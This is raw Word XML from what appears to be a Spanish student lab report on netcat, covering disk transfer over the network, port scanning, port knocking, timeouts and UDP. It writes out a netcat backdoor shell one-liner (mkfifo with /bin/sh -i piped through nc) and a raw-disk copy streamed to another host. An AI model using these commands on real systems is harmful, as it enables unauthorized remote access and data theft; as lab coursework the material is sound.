        <w:t>dd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005C4606">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005C4606">
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005C4606">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="0033636C">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0033636C">
        <w:t>dev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0033636C">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0033636C">
        <w:t>sdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F65A05">
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F65A05">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F65A05">
        <w:t xml:space="preserve"> 192.168.126.130 8080</w:t>
      </w:r>
      <w:r w:rsidR="00D90B44">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00E03B5B">
        <w:t xml:space="preserve"> y en Linux </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0010582D">
        <w:t>PruebasJUbuntu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0010582D">
        <w:t xml:space="preserve"> el comando </w:t>
      </w:r>
      <w:r w:rsidR="00E03B5B">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002641DD">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002641DD">
        <w:t xml:space="preserve"> -l -p 8080 &gt; particion1.iso</w:t>
      </w:r>
      <w:r w:rsidR="00B463DF">
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA6B6F3" w14:textId="38E381DA" w:rsidR="00803FB6" w:rsidRDefault="00803FB6" w:rsidP="00A85FDD">
      <w:r w:rsidRPr="00803FB6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E9883C8" wp14:editId="7CA4B326">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="705914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4083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FB6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E49B486" wp14:editId="15B8FFFE">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="17359516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51656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BC7" w14:textId="48768BB0" w:rsidR="00F61D21" w:rsidRDefault="00F61D21" w:rsidP="00A85FDD">
      <w:r>
        <w:t>Tras la finalización de la creación del .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iso</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> procedo a montarlo en la segunda máquina (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC5E29D" w14:textId="6DAFF8B4" w:rsidR="00F61D21" w:rsidRDefault="006D28A8" w:rsidP="00A85FDD">
      <w:r>
        <w:t>Lo primero que he hecho ha sido crear el directorio que he nombrado “viejo”.</w:t>
      </w:r>
      <w:r w:rsidR="004754C4">
        <w:t xml:space="preserve"> Tras crear el directorio, he montado el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004754C4">
        <w:t>iso</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004754C4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442A5457" w14:textId="271A4B5D" w:rsidR="009A65D7" w:rsidRDefault="009A65D7" w:rsidP="00A85FDD">
      <w:r w:rsidRPr="009A65D7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31BA05B0" wp14:editId="29661460">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="13835084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08461" name="Imagen 1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537" w14:textId="77777777" w:rsidR="00B825F9" w:rsidRDefault="00B825F9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="723CD074" w14:textId="3550A5A2" w:rsidR="00982D72" w:rsidRDefault="006C4A0E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sexto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="007F63E4">
        <w:t>Netcat como backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2C3515" w14:textId="4FC72E59" w:rsidR="00BD727D" w:rsidRDefault="00BD727D" w:rsidP="00BD727D">
      <w:r>
        <w:t xml:space="preserve">Esta práctica se realiza sobre una única máquina que actúa como cliente y como servidor. Para realizarla primero </w:t>
      </w:r>
      <w:r w:rsidR="00F11D59">
        <w:t xml:space="preserve">he creado un archivo sin formato llamado “archivo” y lo he guardado en la carpeta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F11D59">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00761DCC">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="000B402F">
        <w:t>mediante el comando</w:t>
      </w:r>
      <w:r w:rsidR="0013267D">
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0013267D">
        <w:t>rm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0013267D">
        <w:t xml:space="preserve"> -f</w:t>
      </w:r>
      <w:r w:rsidR="0089135F">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0089135F">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0089135F">
        <w:t xml:space="preserve">/archivo; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0089135F">
        <w:t>mkfifo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0089135F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0091061E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0091061E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0091061E">
        <w:t>/archivo”.</w:t>
      </w:r>
      <w:r w:rsidR="000F317E">
        <w:t xml:space="preserve"> Tras ejecutar este primer comando, he escrito “</w:t>
      </w:r>
      <w:r w:rsidR="004C4241">
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000F317E">
        <w:t>cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000F317E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000F317E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000F317E">
        <w:t xml:space="preserve">/archivo | </w:t>
      </w:r>
      <w:r w:rsidR="00306889">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00306889">
        <w:t>bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00306889">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00306889">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00306889">
        <w:t xml:space="preserve"> -i 2&gt;&amp;1 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00306889">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00306889">
        <w:t xml:space="preserve"> -l </w:t>
      </w:r>
      <w:r w:rsidR="00677D72">
        <w:t xml:space="preserve">127.0.0.1 1234 &gt; </w:t>
      </w:r>
      <w:r w:rsidR="001C2888">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00677D72">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00677D72">
        <w:t>/archivo”</w:t>
      </w:r>
      <w:r w:rsidR="001C2888">
        <w:t>. Este apartado no he podido comprobar si ha funcionado dado que no me salía ningún tipo de aviso en el terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A5A833" w14:textId="73764653" w:rsidR="00BA491B" w:rsidRDefault="001C2888">
      <w:r w:rsidRPr="001C2888">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B74D870" wp14:editId="74B355DC">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="554522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22401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56C8" w14:textId="2E691B92" w:rsidR="00B825F9" w:rsidRDefault="00B825F9">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Séptimo</w:t>
      </w:r>
      <w:r>
        <w:t>: Netcat como redirector mediante pipes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AC8EB1" w14:textId="5F5DFAF3" w:rsidR="00B55ED1" w:rsidRDefault="0060374D">
      <w:r>
        <w:t>Este apartado de la práctica requiere de varias máquinas</w:t>
      </w:r>
      <w:r w:rsidR="006B53F6">
        <w:t xml:space="preserve"> las cuales no puedo tener encendidas todas a la vez ya que mi ordenador no las soporta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248F7430" w14:textId="31B0EDB7" w:rsidR="00B825F9" w:rsidRDefault="0052018B">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Octavo</w:t>
      </w:r>
      <w:r>
        <w:t>: Netcat como sencillo escáner de puertos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FA8E26" w14:textId="2B2016E5" w:rsidR="005F63F7" w:rsidRDefault="00C20B19">
      <w:r>
        <w:t xml:space="preserve">Para este apartado, el comando que voy a introducir en la máquina </w:t>
      </w:r>
      <w:r w:rsidR="00F11E05">
        <w:t xml:space="preserve">ubuntudisop1 </w:t>
      </w:r>
      <w:r w:rsidR="00BA1D21">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BA1D21">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BA1D21">
        <w:t xml:space="preserve"> -z</w:t>
      </w:r>
      <w:r w:rsidR="00790579">
        <w:t xml:space="preserve"> 8.8.8.8</w:t>
      </w:r>
      <w:r w:rsidR="00156F56">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00790579">
        <w:t>53</w:t>
      </w:r>
      <w:r w:rsidR="00385491">
        <w:t xml:space="preserve"> &amp;&amp; echo “</w:t>
      </w:r>
      <w:r w:rsidR="0023271F">
        <w:t>Puerto abierto</w:t>
      </w:r>
      <w:r w:rsidR="00385491">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00EE6129">
        <w:t xml:space="preserve"> para comprobar que el puerto 53</w:t>
      </w:r>
      <w:r w:rsidR="00C76787">
        <w:t xml:space="preserve"> (DNS de Google)</w:t>
      </w:r>
      <w:r w:rsidR="00EE6129">
        <w:t xml:space="preserve"> de la IP 8.8.8.8 (Google)</w:t>
      </w:r>
      <w:r w:rsidR="00790579">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F91360" w14:textId="086B3CDA" w:rsidR="002947BC" w:rsidRDefault="00333B01">
      <w:r w:rsidRPr="00333B01">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="150A3B9C" wp14:editId="091B2B0F">
            <wp:extent cx="3200000" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="4256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268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40B7" w14:textId="25299C78" w:rsidR="00CA6323" w:rsidRDefault="00E97648">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Noveno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00CA6323">
        <w:t xml:space="preserve">Netcat utilizado como Port </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CA6323">
        <w:t>Knocking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA6323">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEC5D5B" w14:textId="4D5203F5" w:rsidR="00CA6323" w:rsidRDefault="00744841">
      <w:r>
        <w:t>En este noveno apartado, he ejecutado el comando “</w:t>
      </w:r>
      <w:r w:rsidR="007367AB">
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000D02C3">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000D02C3">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00FA4506">
        <w:t>l -p 500</w:t>
      </w:r>
      <w:r w:rsidR="00B66605">
        <w:t xml:space="preserve"> &amp;&amp; </w:t>
      </w:r>
      <w:r w:rsidR="0092425A">
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B66605">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B66605">
        <w:t xml:space="preserve"> -l -p 400 &amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidR="007367AB">
        <w:t xml:space="preserve"> echo</w:t>
      </w:r>
      <w:r w:rsidR="00B66605">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE55A8">
        <w:t>“hola mundo”</w:t>
      </w:r>
      <w:r w:rsidR="00B66605">
        <w:t xml:space="preserve">” en la máquina </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F4036">
        <w:t>j</w:t>
      </w:r>
      <w:r w:rsidR="000C7FFD">
        <w:t>avier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000C7FFD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F4036">
        <w:t xml:space="preserve">mientras en la máquina ubuntudisop1 he puesto </w:t>
      </w:r>
      <w:r w:rsidR="0092425A">
        <w:t xml:space="preserve">primero </w:t>
      </w:r>
      <w:r w:rsidR="003F4036">
        <w:t>el comando “</w:t>
      </w:r>
      <w:r w:rsidR="001577A0">
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F4036">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F4036">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001577A0">
        <w:t xml:space="preserve">-z 192.168.126.130 500” y a continuación el comando “sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001577A0">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001577A0">
        <w:t xml:space="preserve"> -z 192.168.126.130 400”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595476AB" w14:textId="326D8A6F" w:rsidR="005307C3" w:rsidRDefault="00A57362">
      <w:r w:rsidRPr="00A57362">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F86D3FB" wp14:editId="5E303E10">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="1674979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97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362">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="681C626A" wp14:editId="23F85D18">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="171868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42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DC2" w14:textId="1FBD866C" w:rsidR="007F035D" w:rsidRDefault="007F035D">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Décimo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0075620B">
        <w:t xml:space="preserve">Netcat soporta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0075620B">
        <w:t>timeouts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0075620B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C85B6F" w14:textId="5674B28A" w:rsidR="0075620B" w:rsidRDefault="0075620B">
      <w:r>
        <w:t>En este apartado, los comandos utilizados son “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DD617E">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD617E">
        <w:t xml:space="preserve"> -l 2389” en la máquina </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DD617E">
        <w:t>javier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD617E">
        <w:t>, mientras que en la máquina ubuntudisop1 es “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DD617E">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD617E">
        <w:t xml:space="preserve"> -w 10 </w:t>
      </w:r>
      <w:r w:rsidR="00423DB3">
        <w:t>192.168.126.130</w:t>
      </w:r>
      <w:r w:rsidR="00DD617E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0055440C">
        <w:t>2389”</w:t>
      </w:r>
      <w:r w:rsidR="00423DB3">
        <w:t>. Este comando sirve para cerrar la conexión a los diez segundos sin tráfico.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262A98B4" w14:textId="2B4BC6D9" w:rsidR="0080090A" w:rsidRDefault="0080090A">
      <w:r w:rsidRPr="0080090A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EA5EAF5" wp14:editId="61BFEB97">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="10473405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0503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90A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64728B00" wp14:editId="14A85E97">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="4886710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1091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96C" w14:textId="49AB923D" w:rsidR="00165D76" w:rsidRDefault="00E67133">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Undécimo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00B54454">
        <w:t>Uso de netcat con IP</w:t>
      </w:r>
      <w:r w:rsidR="003A1EF1">
        <w:t>v4 e IPv6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB8FA15" w14:textId="7DE6FA86" w:rsidR="004B0B93" w:rsidRDefault="003F4F6E">
      <w:r>
        <w:t xml:space="preserve">Esta práctica se realiza sobre una única máquina que actúa como cliente y como servidor. </w:t>
      </w:r>
      <w:r w:rsidR="00C929F5">
        <w:t>Para realizar</w:t>
      </w:r>
      <w:r w:rsidR="00AA38FC">
        <w:t>la primero abrimos tres consolas. En la primera escribimos “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB6A1F">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB6A1F">
        <w:t xml:space="preserve"> -4 -l 2389”</w:t>
      </w:r>
      <w:r w:rsidR="004B0B93">
        <w:t>, en la segunda “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004B0B93">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B0B93">
        <w:t xml:space="preserve"> -4 localhost 2389” y en la tercera “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004B0B93">
        <w:t>netstat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B0B93">
        <w:t xml:space="preserve"> | grep 2389”. Para la práctica de IPv6 hacemos lo </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004B0B93">
        <w:t>mismo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004B0B93">
        <w:t xml:space="preserve"> pero cambiando “-4” por “-6”</w:t>
      </w:r>
      <w:r w:rsidR="00246FDB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480B6758" w14:textId="52ACD95E" w:rsidR="00246FDB" w:rsidRDefault="00BB0145">
      <w:r w:rsidRPr="00BB0145">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C531BF9" wp14:editId="7B40231E">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="4970135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3574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1B" w:rsidRPr="000C301B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C1BD180" wp14:editId="0B0B6284">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="10491175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17584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C90" w14:textId="19F6B450" w:rsidR="006C3C3D" w:rsidRDefault="00B87F53">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Duodécimo</w:t>
      </w:r>
      <w:r>
        <w:t>: Impedir que el servidor termine cuando se cierra el cliente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B96A942" w14:textId="038D1D1C" w:rsidR="0031236B" w:rsidRDefault="00766248">
      <w:r>
        <w:t xml:space="preserve">Esta práctica se realiza sobre una única máquina que actúa como cliente y como servidor. Para realizarla primero abrimos </w:t>
      </w:r>
      <w:r w:rsidR="00A93C04">
        <w:t>dos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> consolas. En la primera escribimos “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -l 2389”, en la segunda “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - localhost 2389”</w:t>
      </w:r>
      <w:r w:rsidR="00CC18DB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D65D4CE" w14:textId="5E074119" w:rsidR="00915855" w:rsidRDefault="00C513DF">
      <w:r w:rsidRPr="00C513DF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A3352E2" wp14:editId="0CA4AB2B">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="16316960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605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4116" w14:textId="77777777" w:rsidR="00915855" w:rsidRDefault="00915855">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C05E84" w14:textId="700774AD" w:rsidR="006C3C3D" w:rsidRDefault="006C3C3D">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Decimotercero</w:t>
      </w:r>
      <w:r>
        <w:t>: Impedir que el servidor termine cuando reciba un EOF desde el cliente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADAA9D9" w14:textId="0CC2E425" w:rsidR="00C513DF" w:rsidRDefault="00A93C04">
      <w:r>
        <w:t>Esta práctica se realiza sobre una única máquina que actúa como cliente y como servidor. Para realizarla primero abrimos dos consolas. En la primera escribimos “</w:t>
      </w:r>
      <w:r w:rsidR="00F70681">
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -l 2389”, en la segunda “</w:t>
      </w:r>
      <w:r w:rsidR="00F70681">
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00F960A8">
        <w:t>q 5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> localhost 2389”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F4A274" w14:textId="159F9B4A" w:rsidR="00676096" w:rsidRDefault="00676096">
      <w:r w:rsidRPr="00676096">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27151F94" wp14:editId="02B1A210">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="521533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33007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7295" w14:textId="27B86223" w:rsidR="006C3C3D" w:rsidRDefault="006C3C3D">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Decimocuarto</w:t>
      </w:r>
      <w:r>
        <w:t>: Utilización de netcat con UDP en vez de con TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226C04CE" w14:textId="6392E8B8" w:rsidR="00EC1732" w:rsidRDefault="00EC1732" w:rsidP="00EC1732">
      <w:r>
        <w:t xml:space="preserve">Esta práctica se realiza sobre una única máquina que actúa como cliente y como servidor. Para realizarla primero abrimos </w:t>
      </w:r>
      <w:r w:rsidR="00D91831">
        <w:t>tres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> consolas. En la primera escribimos “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00540855">
        <w:t>4 -u -</w:t>
      </w:r>
      <w:r>
        <w:t>l 2389”, en la segunda “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00040DCE">
        <w:t xml:space="preserve">-4 -u </w:t>
      </w:r>
      <w:r>
        <w:t>localhost 2389”</w:t>
      </w:r>
      <w:r w:rsidR="00D91831">
        <w:t xml:space="preserve"> y en la tercera haré un “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EB1439">
        <w:t>netstat</w:t>
      </w:r>
